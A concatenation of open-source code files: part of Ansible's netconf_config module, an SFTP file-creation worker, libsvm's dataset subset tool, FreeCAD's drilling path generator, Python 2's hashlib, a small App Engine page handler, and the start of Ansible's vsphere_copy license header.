- If I(error_option=rollback-on-error), rollback to the original configuration if
any error occurs.
This requires the remote Netconf server to support the I(error_option=rollback-on-error) capability.
default: stop-on-error
choices: ['stop-on-error', 'continue-on-error', 'rollback-on-error']
version_added: "2.7"
save:
description:
- The C(save) argument instructs the module to save the configuration in C(target) datastore to the
startup-config if changed and if :startup capability is supported by Netconf server.
default: false
version_added: "2.4"
type: bool
backup:
description:
- This argument will cause the module to create a full backup of
the current C(running-config) from the remote device before any
changes are made. If the C(backup_options) value is not given,
the backup file is written to the C(backup) folder in the playbook
root directory or role root directory, if playbook is part of an
ansible role. If the directory does not exist, it is created.
type: bool
default: 'no'
version_added: "2.7"
delete:
description:
- It instructs the module to delete the configuration from value mentioned in C(target) datastore.
type: bool
default: 'no'
version_added: "2.7"
commit:
description:
- This boolean flag controls if the configuration changes should be committed or not after editing the
candidate datastore. This option is supported only if remote Netconf server supports :candidate
capability. If the value is set to I(False) commit won't be issued after edit-config operation
and user needs to handle commit or discard-changes explicitly.
type: bool
default: True
version_added: "2.7"
validate:
description:
- This boolean flag if set validates the content of datastore given in C(target) option.
For this option to work remote Netconf server should support :validate capability.
type: bool
default: False
version_added: "2.7"
src:
description:
- Specifies the source path to the xml file that contains the configuration or configuration template
to load. The path to the source file can either be the full path on the Ansible control host or
a relative path from the playbook or role root directory. This argument is mutually exclusive with I(xml).
version_added: "2.4"
backup_options:
description:
- This is a dict object containing configurable options related to backup file path.
The value of this option is read only when C(backup) is set to I(yes), if C(backup) is set
to I(no) this option will be silently ignored.
suboptions:
filename:
description:
- The filename to be used to store the backup configuration. If the the filename
is not given it will be generated based on the hostname, current time and date
in format defined by <hostname>_config.<current-date>@<current-time>
dir_path:
description:
- This option provides the path ending with directory name in which the backup
configuration file will be stored. If the directory does not exist it will be first
created and the filename is either the value of C(filename) or default filename
as described in C(filename) options description. If the path value is not given
in that case a I(backup) directory will be created in the current working directory
and backup configuration will be copied in C(filename) within I(backup) directory.
type: path
type: dict
version_added: "2.8"
requirements:
- "ncclient"
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- This module supports devices with and without the candidate and
confirmed-commit capabilities. It will always use the safer feature.
- This module supports the use of connection=netconf
'''
EXAMPLES = '''
- name: use lookup filter to provide xml configuration
netconf_config:
content: "{{ lookup('file', './config.xml') }}"
- name: set ntp server in the device
netconf_config:
content: |
<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0">
<system xmlns="urn:ietf:params:xml:ns:yang:ietf-system">
<ntp>
<enabled>true</enabled>
<server>
<name>ntp1</name>
<udp><address>127.0.0.1</address></udp>
</server>
</ntp>
</system>
</config>
- name: wipe ntp configuration
netconf_config:
content: |
<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0">
<system xmlns="urn:ietf:params:xml:ns:yang:ietf-system">
<ntp>
<enabled>false</enabled>
<server operation="remove">
<name>ntp1</name>
</server>
</ntp>
</system>
</config>
- name: configure interface while providing different private key file path (for connection=netconf)
netconf_config:
backup: yes
register: backup_junos_location
vars:
ansible_private_key_file: /home/admin/.ssh/newprivatekeyfile
- name: configurable backup path
netconf_config:
backup: yes
backup_options:
filename: backup.cfg
dir_path: /home/user
'''
RETURN = '''
server_capabilities:
description: list of capabilities of the server
returned: success
type: list
sample: ['urn:ietf:params:netconf:base:1.1','urn:ietf:params:netconf:capability:confirmed-commit:1.0','urn:ietf:params:netconf:capability:candidate:1.0']
backup_path:
description: The full path to the backup file
returned: when backup is yes
type: str
sample: /playbooks/ansible/backup/config.2016-07-16@22:28:34
diff:
description: If --diff option in enabled while running, the before and after configuration change are
returned as part of before and after key.
returned: when diff is enabled
type: dict
sample:
"after": "<rpc-reply>\n<data>\n<configuration>\n<version>17.3R1.10</version>...<--snip-->"
"before": "<rpc-reply>\n<data>\n<configuration>\n <version>17.3R1.10</version>...<--snip-->"
'''
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule, env_fallback
from ansible.module_utils.connection import Connection, ConnectionError
from ansible.module_utils.network.netconf.netconf import get_capabilities, get_config, sanitize_xml
try:
from lxml.etree import tostring
except ImportError:
from xml.etree.ElementTree import tostring
def main():
    """Main entry point for module execution.

    Builds the argument spec, validates the requested options against the
    capabilities advertised by the remote Netconf server, then performs the
    requested datastore operation (copy/delete/commit/edit-config) over the
    persistent connection, reporting the outcome via exit_json/fail_json.
    """
    backup_spec = dict(
        filename=dict(),
        dir_path=dict(type='path')
    )
    argument_spec = dict(
        content=dict(aliases=['xml']),
        target=dict(choices=['auto', 'candidate', 'running'], default='auto', aliases=['datastore']),
        source_datastore=dict(aliases=['source']),
        format=dict(choices=['xml', 'text'], default='xml'),
        lock=dict(choices=['never', 'always', 'if-supported'], default='always'),
        default_operation=dict(choices=['merge', 'replace', 'none']),
        confirm=dict(type='int', default=0),
        confirm_commit=dict(type='bool', default=False),
        error_option=dict(choices=['stop-on-error', 'continue-on-error', 'rollback-on-error'], default='stop-on-error'),
        backup=dict(type='bool', default=False),
        backup_options=dict(type='dict', options=backup_spec),
        save=dict(type='bool', default=False),
        delete=dict(type='bool', default=False),
        commit=dict(type='bool', default=True),
        validate=dict(type='bool', default=False),
    )
    # deprecated options
    netconf_top_spec = {
        'src': dict(type='path', removed_in_version=2.11),
        'host': dict(removed_in_version=2.11),
        'port': dict(removed_in_version=2.11, type='int', default=830),
        'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME']), removed_in_version=2.11, no_log=True),
        'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), removed_in_version=2.11, no_log=True),
        'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), removed_in_version=2.11, type='path'),
        'hostkey_verify': dict(removed_in_version=2.11, type='bool', default=True),
        'look_for_keys': dict(removed_in_version=2.11, type='bool', default=True),
        'timeout': dict(removed_in_version=2.11, type='int', default=10),
    }
    argument_spec.update(netconf_top_spec)
    # Each of these options selects a distinct operation, so exactly one of
    # them must be supplied and they may not be combined.
    mutually_exclusive = [('content', 'src', 'source', 'delete', 'confirm_commit')]
    required_one_of = [('content', 'src', 'source', 'delete', 'confirm_commit')]
    module = AnsibleModule(argument_spec=argument_spec,
                           required_one_of=required_one_of,
                           mutually_exclusive=mutually_exclusive,
                           supports_check_mode=True)
    if module.params['src']:
        module.deprecate(msg="argument 'src' has been deprecated. Use file lookup plugin instead to read file contents.",
                         version="2.11")
    config = module.params['content'] or module.params['src']
    target = module.params['target']
    lock = module.params['lock']
    source = module.params['source_datastore']
    delete = module.params['delete']
    confirm_commit = module.params['confirm_commit']
    confirm = module.params['confirm']
    validate = module.params['validate']
    save = module.params['save']
    # Persistent netconf connection managed by the ansible-connection process.
    conn = Connection(module._socket_path)
    capabilities = get_capabilities(module)
    operations = capabilities['device_operations']
    supports_commit = operations.get('supports_commit', False)
    supports_writable_running = operations.get('supports_writable_running', False)
    supports_startup = operations.get('supports_startup', False)
    # identify target datastore
    if target == 'candidate' and not supports_commit:
        module.fail_json(msg=':candidate is not supported by this netconf server')
    elif target == 'running' and not supports_writable_running:
        module.fail_json(msg=':writable-running is not supported by this netconf server')
    elif target == 'auto':
        # Prefer the candidate datastore when available, fall back to running.
        if supports_commit:
            target = 'candidate'
        elif supports_writable_running:
            target = 'running'
        else:
            module.fail_json(msg='neither :candidate nor :writable-running are supported by this netconf server')
    # Netconf server capability validation against input options
    if save and not supports_startup:
        module.fail_json(msg='cannot copy <%s/> to <startup/>, while :startup is not supported' % target)
    if confirm_commit and not operations.get('supports_confirm_commit', False):
        module.fail_json(msg='confirm commit is not supported by Netconf server')
    if (confirm > 0) and not operations.get('supports_confirm_commit', False):
        module.fail_json(msg='confirm commit is not supported by this netconf server, given confirm timeout: %d' % confirm)
    if validate and not operations.get('supports_validate', False):
        module.fail_json(msg='validate is not supported by this netconf server')
    if lock == 'never':
        execute_lock = False
    elif target in operations.get('lock_datastore', []):
        # lock is requested (always/if-support) and supported => lets do it
        execute_lock = True
    else:
        # lock is requested (always/if-supported) but not supported => issue warning
        module.warn("lock operation on '%s' source is not supported on this device" % target)
        execute_lock = (lock == 'always')
    result = {'changed': False, 'server_capabilities': capabilities.get('server_capabilities', [])}
    before = None
    after = None
    # Tracks whether we hold the datastore lock so `finally` can release it.
    locked = False
    try:
        if module.params['backup']:
            response = get_config(module, target, lock=execute_lock)
            before = to_text(tostring(response), errors='surrogate_then_replace').strip()
            result['__backup__'] = before.strip()
        if validate:
            conn.validate(target)
        # Dispatch on the (mutually exclusive) requested operation.
        if source:
            if not module.check_mode:
                conn.copy(source, target)
            result['changed'] = True
        elif delete:
            if not module.check_mode:
                conn.delete(target)
            result['changed'] = True
        elif confirm_commit:
            if not module.check_mode:
                conn.commit()
            result['changed'] = True
        elif config:
            if module.check_mode and not supports_commit:
                module.warn("check mode not supported as Netconf server doesn't support candidate capability")
                result['changed'] = True
                module.exit_json(**result)
            if execute_lock:
                conn.lock(target=target)
                locked = True
            if before is None:
                before = to_text(conn.get_config(source=target), errors='surrogate_then_replace').strip()
            kwargs = {
                'config': config,
                'target': target,
                'default_operation': module.params['default_operation'],
                'error_option': module.params['error_option'],
                'format': module.params['format'],
            }
            conn.edit_config(**kwargs)
            if supports_commit and module.params['commit']:
                after = to_text(conn.get_config(source='candidate'), errors='surrogate_then_replace').strip()
                if not module.check_mode:
                    # A positive confirm timeout requests a confirmed commit
                    # that auto-rolls-back unless confirmed in time.
                    confirm_timeout = confirm if confirm > 0 else None
                    confirmed_commit = True if confirm_timeout else False
                    conn.commit(confirmed=confirmed_commit, timeout=confirm_timeout)
                else:
                    conn.discard_changes()
            if after is None:
                after = to_text(conn.get_config(source='running'), errors='surrogate_then_replace').strip()
            # Compare sanitized before/after snapshots to detect a real change.
            sanitized_before = sanitize_xml(before)
            sanitized_after = sanitize_xml(after)
            if sanitized_before != sanitized_after:
                result['changed'] = True
            if result['changed']:
                if save and not module.check_mode:
                    conn.copy_config(target, 'startup')
            if module._diff:
                result['diff'] = {'before': sanitized_before, 'after': sanitized_after}
    except ConnectionError as e:
        module.fail_json(msg=to_text(e, errors='surrogate_then_replace').strip())
    finally:
        # Always release the datastore lock if we took it.
        if locked:
            conn.unlock(target=target)
    module.exit_json(**result)
# Standard Ansible module entry point: run only when executed directly.
if __name__ == '__main__':
    main()
| gpl-3.0 |
LTD-Beget/sprutio-rpc | lib/FileManager/workers/sftp/newFile.py | 1 | 1671 | import traceback
from lib.FileManager.workers.baseWorkerCustomer import BaseWorkerCustomer
class NewFile(BaseWorkerCustomer):
    """Worker that creates a new, empty file on a remote host over SFTP.

    On success, the created file's metadata is passed to on_success();
    failures are reported through on_error() with a traceback payload.
    """
    def __init__(self, path, session, *args, **kwargs):
        # path: remote path of the file to create
        # session: SFTP session descriptor used to obtain the connection
        super(NewFile, self).__init__(*args, **kwargs)
        self.path = path
        self.session = session
    def run(self):
        """Create the file remotely and report the outcome via callbacks."""
        try:
            self.preload()
            sftp = self.get_sftp_connection(self.session)
            abs_path = self.path
            self.logger.debug("FM NewFile worker run(), abs_path = %s" % abs_path)
            try:
                # Refuse to overwrite an existing path.
                if sftp.exists(abs_path):
                    raise OSError("File path already exists")
                # Opening in 'w' mode creates the (empty) file on the server.
                fd = sftp.open(abs_path, 'w')
                if fd:
                    fd.close()
                    info = sftp.make_file_info(abs_path)
                    info["name"] = abs_path
                else:
                    raise Exception('Cannot write file resource on server')
                result = {
                    "data": info,
                    "error": False,
                    "message": None,
                    "traceback": None
                }
                self.on_success(result)
            except OSError:
                # NOTE(review): any OSError (not only the "already exists" one
                # raised above) is reported with this fixed message -- confirm
                # that is intended.
                result = {
                    "error": True,
                    "message": "File path already exists",
                    "traceback": traceback.format_exc()
                }
                self.on_error(result)
        except Exception as e:
            result = {
                "error": True,
                "message": str(e),
                "traceback": traceback.format_exc()
            }
            self.on_error(result)
| gpl-3.0 |
surban/libsvm-orig | tools/subset.py | 124 | 3202 | #!/usr/bin/env python
import os, sys, math, random
from collections import defaultdict
if sys.version_info[0] >= 3:
xrange = range
def exit_with_help(argv):
    """Print the usage text for argv[0] and terminate with exit status 1."""
    usage = """\
Usage: {0} [options] dataset subset_size [output1] [output2]
This script randomly selects a subset of the dataset.
options:
-s method : method of selection (default 0)
     0 -- stratified selection (classification only)
     1 -- random selection
output1 : the subset (optional)
output2 : rest of the data (optional)
If output1 is omitted, the subset will be printed on the screen.""".format(argv[0])
    print(usage)
    exit(1)
def process_options(argv):
    """Parse command-line arguments for the subset script.

    Returns a tuple ``(dataset, subset_size, method, subset_file, rest_file)``
    where ``subset_file`` defaults to ``sys.stdout`` and ``rest_file`` to
    ``None`` when the optional positional outputs are not supplied.
    """
    argc = len(argv)
    if argc < 3:
        exit_with_help(argv)

    # Defaults: stratified selection, subset printed to stdout, rest discarded.
    method = 0
    subset_file = sys.stdout
    rest_file = None

    # Scan option arguments until the first positional (non "-") argument.
    idx = 1
    while idx < argc:
        if argv[idx][0] != "-":
            break
        if argv[idx] == "-s":
            idx += 1
            method = int(argv[idx])
            if method not in (0, 1):
                print("Unknown selection method {0}".format(method))
                exit_with_help(argv)
        idx += 1

    dataset = argv[idx]
    subset_size = int(argv[idx + 1])
    if idx + 2 < argc:
        subset_file = open(argv[idx + 2], 'w')
    if idx + 3 < argc:
        rest_file = open(argv[idx + 3], 'w')
    return dataset, subset_size, method, subset_file, rest_file
def random_selection(dataset, subset_size):
    """Return *subset_size* distinct line indices of *dataset*, sorted.

    Indices are drawn uniformly at random without replacement from the
    range [0, number_of_lines).
    """
    # Bug fix: close the file after counting lines instead of leaking the
    # handle (the original called open() inside the generator expression).
    with open(dataset, 'r') as f:
        line_count = sum(1 for line in f)
    # range() works on both py2 and py3 here; random.sample accepts either.
    return sorted(random.sample(range(line_count), subset_size))
def stratified_selection(dataset, subset_size):
    """Return *subset_size* sorted line indices of *dataset*, sampled so that
    each label keeps roughly its original proportion.

    The first whitespace-separated token of each line is treated as the label.
    Exits with an error message if proportional rounding cannot give every
    class at least one instance (e.g. regression data or tiny/unbalanced sets).
    """
    # Bug fix: close the dataset file after reading the labels instead of
    # leaking the handle opened inside the list comprehension.
    with open(dataset) as f:
        labels = [line.split(None, 1)[0] for line in f]
    label_linenums = defaultdict(list)
    for i, label in enumerate(labels):
        label_linenums[label].append(i)

    l = len(labels)
    remaining = subset_size
    ret = []

    # classes with fewer data are sampled first; otherwise
    # some rare classes may not be selected
    for label in sorted(label_linenums, key=lambda x: len(label_linenums[x])):
        linenums = label_linenums[label]
        label_size = len(linenums)
        # at least one instance per class
        s = int(min(remaining, max(1, math.ceil(label_size*(float(subset_size)/l)))))
        if s == 0:
            sys.stderr.write('''\
Error: failed to have at least one instance per class
     1. You may have regression data.
     2. Your classification data is unbalanced or too small.
Please use -s 1.
''')
            sys.exit(-1)
        remaining -= s
        ret += [linenums[i] for i in random.sample(range(label_size), s)]
    return sorted(ret)
def main(argv=sys.argv):
    """Select a subset of *dataset* lines and write them out.

    Parses options from *argv*, picks line indices by the chosen method, then
    streams the dataset once: selected lines go to the subset output, all
    other lines to the optional rest-of-data output.
    """
    dataset, subset_size, method, subset_file, rest_file = process_options(argv)
    #uncomment the following line to fix the random seed
    #random.seed(0)
    selected_lines = []
    if method == 0:
        selected_lines = stratified_selection(dataset, subset_size)
    elif method == 1:
        selected_lines = random_selection(dataset, subset_size)
    #select instances based on selected_lines
    with open(dataset, 'r') as data:
        prev_selected_linenum = -1
        for linenum in selected_lines:
            # copy the unselected lines between two selected ones to rest_file
            for _ in range(linenum - prev_selected_linenum - 1):
                line = data.readline()
                if rest_file:
                    rest_file.write(line)
            subset_file.write(data.readline())
            prev_selected_linenum = linenum
        # Bug fix: the original unconditionally closed subset_file, which is
        # sys.stdout when no output file was given; only close real files.
        if subset_file is not sys.stdout:
            subset_file.close()
        if rest_file:
            # everything after the last selected line belongs to the rest set
            for line in data:
                rest_file.write(line)
            rest_file.close()
if __name__ == '__main__':
main(sys.argv)
| bsd-3-clause |
Creworker/FreeCAD | src/Mod/Path/PathScripts/PathDrilling.py | 9 | 8433 | # -*- coding: utf-8 -*-
#***************************************************************************
#* *
#* Copyright (c) 2014 Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD,FreeCADGui,Path,PathGui
from PySide import QtCore,QtGui
from PathScripts import PathUtils,PathSelection,PathProject
"""Path Drilling object and FreeCAD command"""
# Qt translation handling: Qt4's QApplication.translate() takes an encoding
# argument that is absent in later bindings, so probe for the constant once
# at import time and define translate() to match the available signature.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def translate(context, text, disambig=None):
        # Older API: pass the UTF-8 encoding constant explicitly.
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def translate(context, text, disambig=None):
        # Newer API: the encoding argument no longer exists.
        return QtGui.QApplication.translate(context, text, disambig)
class ObjectDrilling:
    """Path Drilling operation.

    Builds a canned-cycle g-code path (G81, or G83 when pecking) from the
    hole locations stored on the FreeCAD document object.
    """

    def __init__(self, obj):
        """Attach the drilling properties to *obj* and install this proxy."""
        # obj.addProperty("App::PropertyVector","StartPoint","Path",translate("PathProfile","The start position of the drilling"))
        obj.addProperty("App::PropertyLinkSub", "Base", "Path", translate("Parent Object", "The base geometry of this toolpath"))
        obj.addProperty("App::PropertyVectorList", "locations", "Path", "The drilling locations")
        obj.addProperty("App::PropertyLength", "PeckDepth", "Drilling", translate("PeckDepth", "Incremental Drill depth before retracting to clear chips"))
        # obj.PeckDepth = (0,0,1000,1)
        obj.addProperty("App::PropertyDistance", "ClearanceHeight", "Drilling", translate("Clearance Height", "The height needed to clear clamps and obstructions"))
        obj.addProperty("App::PropertyDistance", "FinalDepth", "Drilling", translate("Final Depth", "Final Depth of Tool- lowest value in Z"))
        obj.addProperty("App::PropertyDistance", "RetractHeight", "Drilling", translate("Retract Height", "The height where feed starts and height during retract tool when path is finished"))
        obj.addProperty("App::PropertyLength", "VertFeed", "Feed", translate("Vert Feed", "Feed rate for vertical moves in Z"))
        # obj.addProperty("App::PropertySpeed", "HorizFeed", "Feed",translate("Horiz Feed","Feed rate for horizontal moves")) #not needed for drilling
        obj.addProperty("App::PropertyString", "Comment", "Path", translate("PathProject", "An optional comment for this profile"))
        obj.addProperty("App::PropertyBool", "Active", "Path", translate("Active", "Make False, to prevent operation from generating code"))
        obj.addProperty("App::PropertyIntegerConstraint", "ToolNumber", "Tool", translate("PathProfile", "The tool number in use"))
        obj.ToolNumber = (0, 0, 1000, 1)
        obj.setEditorMode('ToolNumber', 1)  # make this read only
        obj.Proxy = self

    def __getstate__(self):
        # no proxy state needs to be saved with the document
        return None

    def __setstate__(self, state):
        # nothing to restore
        return None

    def execute(self, obj):
        """Regenerate obj.Path from the stored hole locations.

        Emits absolute positioning with return-to-initial-Z (G90 G98), a
        rapid to the first hole and the clearance plane, then one canned
        cycle per hole, closed by G80.
        """
        output = "G90 G98\n"
        # rapid to first hole location, with spindle still retracted:
        p0 = obj.locations[0]
        output += "G0 X" + str(p0.x) + " Y" + str(p0.y) + "\n"
        # move tool to clearance plane
        output += "G0 Z" + str(obj.ClearanceHeight.Value) + "\n"
        # A positive peck depth selects the chip-breaking cycle (G83) with a
        # Q word; otherwise plain drilling (G81).
        if obj.PeckDepth.Value > 0:
            cmd = "G83"
            qword = " Q" + str(obj.PeckDepth.Value)
        else:
            cmd = "G81"
            qword = ""
        for p in obj.locations:
            output += cmd + " X" + str(p.x) + " Y" + str(p.y) + " Z" + str(obj.FinalDepth.Value) + qword + " R" + str(obj.RetractHeight.Value) + " F" + str(obj.VertFeed.Value) + "\n"
        output += "G80\n"
        # print() works on both Python 2 and 3; the bare "print output"
        # statement was Python 2 only and is a syntax error on Python 3.
        print(output)
        path = Path.Path(output)
        obj.Path = path
        # tie the toolnumber to the PathLoadTool object ToolNumber
        if len(obj.InList) > 0:  # check to see if obj is in the Project group yet
            project = obj.InList[0]
            tl = int(PathUtils.changeTool(obj, project))
            obj.ToolNumber = tl
class _ViewProviderDrill:
    """Minimal view provider for a Drilling path object: supplies the tree
    icon and no-op implementations of the optional GUI hooks."""
    def __init__(self,obj): #mandatory
        # bind this provider to the view object
        # obj.addProperty("App::PropertyFloat","SomePropertyName","PropertyGroup","Description of this property")
        obj.Proxy = self
    def __getstate__(self): #mandatory
        # no provider state needs saving with the document
        return None
    def __setstate__(self,state): #mandatory
        # nothing to restore
        return None
    def getIcon(self): #optional
        # icon shown next to the object in the model tree
        return ":/icons/Path-Drilling.svg"
    # def attach(self): #optional
    #     # this is executed on object creation and object load from file
    #     pass
    def onChanged(self,obj,prop): #optional
        # this is executed when a property of the VIEW PROVIDER changes
        pass
    def updateData(self,obj,prop): #optional
        # this is executed when a property of the APP OBJECT changes
        pass
    def setEdit(self,vobj,mode): #optional
        # this is executed when the object is double-clicked in the tree
        pass
    def unsetEdit(self,vobj,mode): #optional
        # this is executed when the user cancels or terminates edit mode
        pass
class CommandPathDrilling:
    """GUI command that creates a Path Drilling object from the current
    selection (vertexes and circular edges)."""

    def GetResources(self):
        """Icon, menu text, shortcut and tooltip for the command."""
        return {'Pixmap': 'Path-Drilling',
                'MenuText': QtCore.QT_TRANSLATE_NOOP("PathDrilling", "Drilling"),
                'Accel': "P, D",
                'ToolTip': QtCore.QT_TRANSLATE_NOOP("PathDrilling", "Creates a Path Drilling object")}

    def IsActive(self):
        """The command is available only while a document is open."""
        # "x is not None" is the idiomatic spelling of "not x is None".
        return FreeCAD.ActiveDocument is not None

    def Activated(self):
        """Create the Drilling object and collect hole positions from the
        selected vertexes and circular-edge centers."""
        import Path
        import Part
        from PathScripts import PathUtils, PathDrilling, PathProject
        selection = FreeCADGui.Selection.getSelectionEx()
        if not selection:
            return
        # if everything is ok, execute and register the transaction in the undo/redo stack
        FreeCAD.ActiveDocument.openTransaction(translate("PathDrilling", "Create Drilling"))
        FreeCADGui.addModule("PathScripts.PathDrilling")
        obj = FreeCAD.ActiveDocument.addObject("Path::FeaturePython", "Drilling")
        PathDrilling.ObjectDrilling(obj)
        myList = obj.locations
        for sub in selection:
            for point in sub.SubObjects:
                if isinstance(point, Part.Vertex):
                    myList.append(FreeCAD.Vector(point.X, point.Y, point.Z))
                if isinstance(point, Part.Edge):
                    # circular edges contribute their center as a hole position
                    if isinstance(point.Curve, Part.Circle):
                        center = point.Curve.Center
                        myList.append(FreeCAD.Vector(center.x, center.y, center.z))
        obj.locations = myList
        PathDrilling._ViewProviderDrill(obj.ViewObject)
        # obj.ViewObject.Proxy = 0
        obj.Active = True
        project = PathUtils.addToProject(obj)
        tl = PathUtils.changeTool(obj, project)
        if tl:
            obj.ToolNumber = tl
        FreeCAD.ActiveDocument.commitTransaction()
        FreeCAD.ActiveDocument.recompute()
if FreeCAD.GuiUp:
    # register the FreeCAD command only when the GUI is available
    FreeCADGui.addCommand('Path_Drilling',CommandPathDrilling())

FreeCAD.Console.PrintLog("Loading PathDrilling... done\n")
| lgpl-2.1 |
antb/TPT----My-old-mod | src/python/stdlib/hashlib.py | 12 | 4893 | # $Id: hashlib.py 78528 2010-03-01 02:01:47Z gregory.p.smith $
#
# Copyright (C) 2005 Gregory P. Smith (greg@krypto.org)
# Licensed to PSF under a Contributor Agreement.
#
__doc__ = """hashlib module - A common interface to many hash functions.
new(name, string='') - returns a new hash object implementing the
given hash function; initializing the hash
using the given string data.
Named constructor functions are also available, these are much faster
than using new():
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
More algorithms may be available on your platform but the above are
guaranteed to exist.
NOTE: If you want the adler32 or crc32 hash functions they are available in
the zlib module.
Choose your hash function wisely. Some have known collision weaknesses.
sha384 and sha512 will be slow on 32 bit platforms.
Hash objects have these methods:
- update(arg): Update the hash object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- copy(): Return a copy (clone) of the hash object. This can be used to
efficiently compute the digests of strings that share a common
initial substring.
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import hashlib
>>> m = hashlib.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
'\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9'
More condensed:
>>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest()
'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2'
"""
# This tuple and __get_builtin_constructor() must be modified if a new
# always available algorithm is added.
__always_supported = ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')

# Public alias for the guaranteed algorithm names; exported via __all__.
algorithms = __always_supported

__all__ = __always_supported + ('new', 'algorithms')
def __get_builtin_constructor(name):
    """Return the builtin (non-OpenSSL) constructor for *name*.

    The private accelerator module is imported lazily, only when its
    algorithm is actually requested.  Raises ValueError for names with no
    builtin implementation.
    """
    if name in ('SHA1', 'sha1'):
        import _sha
        return _sha.new
    if name in ('MD5', 'md5'):
        import _md5
        return _md5.new
    if name in ('SHA256', 'sha256', 'SHA224', 'sha224'):
        import _sha256
        return _sha256.sha224 if name.endswith('224') else _sha256.sha256
    if name in ('SHA512', 'sha512', 'SHA384', 'sha384'):
        import _sha512
        return _sha512.sha384 if name.endswith('384') else _sha512.sha512
    raise ValueError('unsupported hash type %s' % name)
def __get_openssl_constructor(name):
    """Return the OpenSSL-backed constructor for *name*, falling back to the
    builtin implementation when OpenSSL does not provide the algorithm.

    Relies on the module-global _hashlib imported further down this file.
    """
    try:
        f = getattr(_hashlib, 'openssl_' + name)
        # Allow the C module to raise ValueError. The function will be
        # defined but the hash not actually available thanks to OpenSSL.
        f()
        # Use the C function directly (very fast)
        return f
    except (AttributeError, ValueError):
        return __get_builtin_constructor(name)
def __py_new(name, string=''):
    """Return a new hashing object for *name*, optionally fed with *string*.

    Pure-builtin dispatch used when the _hashlib (OpenSSL) extension module
    is not importable.
    """
    constructor = __get_builtin_constructor(name)
    return constructor(string)
def __hash_new(name, string=''):
    """new(name, string='') - Return a new hashing object using the named algorithm;
    optionally initialized with a string.

    Prefers the OpenSSL implementation and falls back to the builtin one.
    """
    try:
        return _hashlib.new(name, string)
    except ValueError:
        # If the _hashlib module (OpenSSL) doesn't support the named
        # hash, try using our builtin implementations.
        # This allows for SHA224/256 and SHA384/512 support even though
        # the OpenSSL library prior to 0.9.8 doesn't provide them.
        return __get_builtin_constructor(name)(string)
# Bind new() to the fastest available implementation: OpenSSL-backed when
# the _hashlib extension imports, the pure builtin modules otherwise.
try:
    import _hashlib
    new = __hash_new
    __get_hash = __get_openssl_constructor
except ImportError:
    new = __py_new
    __get_hash = __get_builtin_constructor

# Publish one module-level constructor per guaranteed algorithm
# (hashlib.md5, hashlib.sha1, ...).
for __func_name in __always_supported:
    # try them all, some may not work due to the OpenSSL
    # version not supporting that algorithm.
    try:
        globals()[__func_name] = __get_hash(__func_name)
    except ValueError:
        import logging
        logging.exception('code for hash %s was not found.', __func_name)

# Cleanup locals()
del __always_supported, __func_name, __get_hash
del __py_new, __hash_new, __get_openssl_constructor
| gpl-2.0 |
puruckertom/poptox | poptox/yulefurry/yulefurry_qaqc.py | 1 | 1396 | import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
import numpy as np
import cgi
import cgitb
cgitb.enable()
class yulefurryQaqcPage(webapp.RequestHandler):
    """Renders the QA/QC page for the Yule-Furry model by concatenating the
    shared "uber" template fragments in display order."""
    def get(self):
        # templates live in the sibling "templates" directory
        templatepath = os.path.dirname(__file__) + '/../templates/'
        html = template.render(templatepath + '01pop_uberheader.html', 'title')
        html = html + template.render(templatepath + '02pop_uberintroblock_wmodellinks.html', {'model':'yulefurry','page':'qaqc'})
        html = html + template.render (templatepath + '03pop_ubertext_links_left.html', {})
        html = html + template.render(templatepath + '04uberinput_start.html', {
            'model':'yulefurry',
            'model_attributes':'Yule-Furry Markov Process QAQC'})
        # no input widgets on the QA/QC page, so the input block is closed
        # immediately with an empty sub_title
        html = html + template.render(templatepath + '04uberinput_end.html', {'sub_title': ''})
        html = html + template.render(templatepath + '05pop_ubertext_links_right.html', {})
        html = html + template.render(templatepath + '06pop_uberfooter.html', {'links': ''})
        self.response.out.write(html)
# Route every path of this handler script to the QA/QC page.
app = webapp.WSGIApplication([('/.*', yulefurryQaqcPage)], debug=True)

def main():
    # Entry point used by the App Engine CGI runtime.
    run_wsgi_app(app)

if __name__ == '__main__':
    main()
| unlicense |
aerickson/ansible | lib/ansible/modules/cloud/vmware/vsphere_copy.py | 36 | 6516 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015 Dag Wieers <dag@wieers.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
